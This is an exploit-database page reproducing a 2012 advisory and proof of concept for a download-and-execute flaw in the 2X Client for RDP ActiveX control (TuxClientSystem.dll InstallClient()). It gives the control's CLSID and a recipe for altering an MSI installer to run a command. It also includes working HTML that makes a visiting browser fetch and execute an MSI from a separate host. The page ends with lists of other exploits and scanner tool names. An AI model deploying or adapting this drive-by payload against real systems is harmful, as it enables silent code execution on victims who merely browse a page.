"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute"

Author

Exploit author

rgod

Platform

Exploit platform

windows

Release date

Exploit published date

2012-03-19

                
                    
                         Download file
                    
                
            
2X Client for RDP 10.1.1204 ClientSystem Class ActiveX Control 
TuxClientSystem.dll InstallClient() Download and Execute 
Vulnerability

tested against: Microsoft Windows Vista SP2
                Microsoft Windows Server 2003 r2 sp2
                Internet Explorer 8

vendor description:
"2X Software is a global leader of desktop and application delivery, 
remote access and cloud computing solutions."

2x homepage: http://www.2x.com/

download url: http://www.2x.com/rdp-client/windows-linux-mac/downloadlinks/

file tested: 2XClient.msi

Background:

the mentioned product installs an ActiveX control with the following
settings:


ProgID: TuxClientSystem.ClientSystem.1
CLSID: {F5DF8D65-559D-4b75-8562-5302BD2F5F20}
Binary path: C:\Program Files\2X\Client\TuxClientSystem.dll
Implements IObjectSafety: True
Safe for Scripting: True
Safe for Initialization: ?

According to the IObjectSafety interface this control is Safe 
for Scripting, then Internet Explorer will allow the scripting
of this control.

Vulnerability:

...
/* DISPID=2 */
	function InstallClient(
		/* VT_BSTR [8] [in] */ $msiPath,
		/* VT_I4 [3]  */ $bFullInstallation 
		)
	{
		/* method InstallClient */
	}
...

The first argument of this method accepts a file location on the
internet. By supplying the url of a .msi installer, the mentioned
control will download and execute the file without no user 
interaction other then browsing a web page.

To demonstrate this vulnerability I modified an
existing standalone msi installer through free availiable tools
by replacing a CustomAction row with the following values:

Action  Type    Source                                                  Target                       ExtendedType
Run	226	SystemFolder.98CB24AD_52FB_DB5F_FF1F_C8B3B9A1E18E	"""cmd.exe"" /c start calc"  <null>	



As attachment:
9sg_2x.html - host on a web server and change the position of x.msi
              then browse this page


POC:
<!-- 2X Client for RDP 10.1 ClientSystem Class ActiveX Control TuxClientSystem.dll
     InstallClient() Download and Execute Vulnerability PoC
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:F5DF8D65-559D-4B75-8562-5302BD2F5F20' id='obj' />
</object>
<script>
obj.InstallClient("http://192.168.2.101:4444/x.msi",1);
</script>

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2013-12-11	"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution"	remote	windows	rgod
2013-10-04	"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution"	remote	php	rgod
2013-05-26	"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution"	dos	windows	rgod
2013-05-26	"SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution"	remote	windows	rgod
2013-01-07	"Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)"	dos	windows	rgod
2012-11-15	"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution"	remote	windows	rgod
2012-11-15	"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution"	remote	windows	rgod
2012-08-07	"Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution"	remote	windows	rgod
2012-08-07	"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion"	remote	windows	rgod
2012-08-06	"AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution"	dos	windows	rgod
2012-05-11	"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow"	local	windows	rgod
2012-04-30	"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution"	remote	windows	rgod
2012-04-05	"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite"	remote	windows	rgod
2012-04-05	"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite"	remote	windows	rgod
2012-03-28	"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow"	remote	hardware	rgod
2012-03-28	"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes"	remote	windows	rgod
2012-03-28	"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow"	remote	hardware	rgod
2012-03-28	"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution"	remote	windows	rgod
2012-03-22	"Google Talk - 'gtalk://' Deprecated URI Handler Injection"	remote	windows	rgod
2012-03-22	"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)"	dos	windows	rgod
2012-03-19	"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion"	remote	windows	rgod
2012-03-19	"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal"	webapps	jsp	rgod
2012-03-19	"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute"	remote	windows	rgod
2012-03-19	"Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow"	remote	windows	rgod
2012-03-19	"LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution"	remote	windows	rgod
2012-03-19	"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite"	remote	windows	rgod
2011-11-07	"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow"	remote	windows	rgod
2011-11-02	"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution"	remote	windows	rgod
2011-10-31	"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)"	dos	windows	rgod
2011-10-24	"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method"	remote	windows	rgod

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.